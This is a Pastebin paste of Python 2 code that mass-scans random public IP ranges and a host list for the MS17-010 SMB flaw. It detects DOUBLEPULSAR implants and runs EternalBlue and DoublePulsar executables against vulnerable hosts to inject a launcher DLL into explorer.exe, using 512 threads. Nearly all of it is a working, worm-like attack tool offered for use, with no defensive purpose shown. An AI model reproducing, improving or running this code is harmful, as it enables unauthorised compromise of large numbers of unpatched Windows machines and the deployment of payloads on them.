Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from impacket import smb, ntlm, smbconnection, nt_errors
- from impacket.uuid import uuidtup_to_bin
- import socket
- from mysmb import MYSMB
- from impacket import smb
- from struct import pack, unpack
- import socket
- import time
- import threading
- import random
- import binascii
- import itertools
- import os
- '''
- Script for
- - check target if MS17-010 is patched or not.
- - find accessible named pipe
- '''
- USERNAME = ''
- PASSWORD = ''
- NDR64Syntax = ('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0')
- MSRPC_UUID_BROWSER = uuidtup_to_bin(('6BFFD098-A112-3610-9833-012892020162','0.0'))
- MSRPC_UUID_SPOOLSS = uuidtup_to_bin(('12345678-1234-ABCD-EF00-0123456789AB','1.0'))
- MSRPC_UUID_NETLOGON = uuidtup_to_bin(('12345678-1234-ABCD-EF00-01234567CFFB','1.0'))
- MSRPC_UUID_LSARPC = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AB','0.0'))
- MSRPC_UUID_SAMR = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AC','1.0'))
- pipes = {
- 'browser' : MSRPC_UUID_BROWSER,
- 'spoolss' : MSRPC_UUID_SPOOLSS,
- 'netlogon' : MSRPC_UUID_NETLOGON,
- 'lsarpc' : MSRPC_UUID_LSARPC,
- 'samr' : MSRPC_UUID_SAMR,
- }
- def check(target):
- conn = MYSMB(target)
- try:
- conn.login(USERNAME, PASSWORD)
- except smb.SessionError as e:
- print('[-] Login failed: ' + nt_errors.ERROR_MESSAGES[e.error_code][0])
- return False
- finally:
- print('[.] Target OS: ' + conn.get_server_os())
- tid = conn.tree_connect_andx('\\\\'+target+'\\'+'IPC$')
- conn.set_default_tid(tid)
- # test if target is vulnerable
- TRANS_PEEK_NMPIPE = 0x23
- recvPkt = conn.send_trans(pack('<H', TRANS_PEEK_NMPIPE), maxParameterCount=0xffff, maxDataCount=0x800)
- status = recvPkt.getNTStatus()
- if status == 0xC0000205: # STATUS_INSUFF_SERVER_RESOURCES
- print('[+] The target is not patched!')
- return True
- else:
- print('[-] The target is patched.')
- # Packets
- negotiate_protocol_request = binascii.unhexlify("00000085ff534d4272000000001853c00000000000000000000000000000fffe00004000006200025043204e4554574f524b2050524f4752414d20312e3000024c414e4d414e312e30000257696e646f777320666f7220576f726b67726f75707320332e316100024c4d312e325830303200024c414e4d414e322e3100024e54204c4d20302e313200")
- session_setup_request = binascii.unhexlify("00000088ff534d4273000000001807c00000000000000000000000000000fffe000040000dff00880004110a000000000000000100000000000000d40000004b000000000000570069006e0064006f007700730020003200300030003000200032003100390035000000570069006e0064006f007700730020003200300030003000200035002e0030000000")
- tree_connect_request = binascii.unhexlify("00000060ff534d4275000000001807c00000000000000000000000000000fffe0008400004ff006000080001003500005c005c003100390032002e003100360038002e003100370035002e003100320038005c00490050004300240000003f3f3f3f3f00")
- trans2_session_setup = binascii.unhexlify("0000004eff534d4232000000001807c00000000000000000000000000008fffe000841000f0c0000000100000000000000a6d9a40000000c00420000004e0001000e000d0000000000000000000000000000")
- def calculate_doublepulsar_xor_key(s):
- x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))
- x = x & 0xffffffff # this line was added just to truncate to 32 bits
- return x
- # The arch is adjacent to the XOR key in the SMB signature
- def calculate_doublepulsar_arch(s):
- if s & 0xffffffff00000000 == 0:
- return "x86 (32-bit)"
- else:
- return "x64 (64-bit)"
- def print_status(ip, message):
- global print_lock
- with print_lock:
- print "[*] [%s] %s" % (ip, message)
- def check_ip(ip):
- global negotiate_protocol_request, session_setup_request, tree_connect_request, trans2_session_setup, timeout, verbose
- # Connect to socket
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.settimeout(5)
- host = ip
- port = 445
- s.connect((host, port))
- # Send/receive negotiate protocol request
- s.send(negotiate_protocol_request)
- s.recv(1024)
- # Send/receive session setup request
- s.send(session_setup_request)
- session_setup_response = s.recv(1024)
- # Extract user ID from session setup response
- user_id = session_setup_response[32:34]
- # Replace user ID in tree connect request packet
- modified_tree_connect_request = list(tree_connect_request)
- modified_tree_connect_request[32] = user_id[0]
- modified_tree_connect_request[33] = user_id[1]
- modified_tree_connect_request = "".join(modified_tree_connect_request)
- # Send tree connect request
- s.send(modified_tree_connect_request)
- tree_connect_response = s.recv(1024)
- # Extract tree ID from response
- tree_id = tree_connect_response[28:30]
- # Replace tree ID and user ID in trans2 session setup packet
- modified_trans2_session_setup = list(trans2_session_setup)
- modified_trans2_session_setup[28] = tree_id[0]
- modified_trans2_session_setup[29] = tree_id[1]
- modified_trans2_session_setup[32] = user_id[0]
- modified_trans2_session_setup[33] = user_id[1]
- modified_trans2_session_setup = "".join(modified_trans2_session_setup)
- s.send(modified_trans2_session_setup)
- final_response = s.recv(1024)
- s.close()
- # Check for 0x51 response to indicate DOUBLEPULSAR infection
- if final_response[34] == "\x51":
- signature = final_response[18:26]
- signature_long = unpack('<Q', signature)[0]
- key = calculate_doublepulsar_xor_key(signature_long)
- arch = calculate_doublepulsar_arch(signature_long)
- print "[+] [%s] DOUBLEPULSAR SMB IMPLANT DETECTED!!! Arch: %s, XOR Key: %s" % (ip, arch, hex(key))
- return arch
- else:
- return False
- def exploit(IP):
- print os.popen("Eternalblue-2.2.0.exe --TargetIp " + IP).read()
- arch = check_ip(IP)
- if arch == "x86 (32-bit)":
- print os.popen("Doublepulsar-1.3.1.exe --TargetIp " + IP + " --Function RunDll --DllPayload launcher.x86.dll --ProcessName explorer.exe").read()
- elif arch == "x64 (64-bit)":
- print os.popen("Doublepulsar-1.3.1.exe --TargetIp " + IP + " --Function RunDll --DllPayload launcher.x64.dll --ProcessName explorer.exe").read()
- def gen_IP_block():
- not_valid = [10,127,169,172,192]
- first = random.randrange(1,256)
- while first in not_valid:
- first = random.randrange(1,256)
- ip = ".".join([str(first),str(random.randrange(1,256)),
- str(random.randrange(1,256))])
- return ip+".1-255"
- def ip_range(input_string):
- octets = input_string.split('.')
- chunks = [map(int, octet.split('-')) for octet in octets]
- ranges = [range(c[0], c[1] + 1) if len(c) == 2 else c for c in chunks]
- for address in itertools.product(*ranges):
- yield '.'.join(map(str, address))
- def Scan(IP):
- try:
- s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.settimeout(0.50)
- s.connect((IP, 445))
- s.close()
- if check(IP):
- exploit(IP)
- except Exception as e:
- pass
- def HaxThread():
- while 1:
- for IP in ip_range(gen_IP_block()):
- Scan(IP)
- def checklist(chunk):
- # for ipblock in chunk:
- # for host in ip_range(ipblock):
- for host in chunk:
- Scan(host)
- threads = 512
- lines = open("smb.txt","r").read().split("\n")
- random.shuffle(lines)
- def chunkify(lst,n):
- return [ lst[i::n] for i in xrange(n) ]
- chunks = chunkify(lines, threads) # make seperate chunk for each thread
- for thread in xrange(0,threads):
- if thread >= 384:
- time.sleep(0.2)
- try:
- threading.Thread(target = checklist, args = (chunks[thread],)).start()
- except:
- pass
- print "Scanning... Press enter 3 times to stop."
- for i in range(0,3):
- raw_input()
- os.popen("taskkill /f /pid " + str(os.getpid()))
- """
- hosts=''''''.split("\n")
- random.shuffle(hosts)
- for IP in hosts:
- try:
- threading.Thread(target=Scan, args=(IP,)).start()
- except:
- time.sleep(10)
- try:
- threading.Thread(target=Scan, args=(IP,)).start()
- except:
- pass
- pass
- """
Add Comment
Please, Sign In to add comment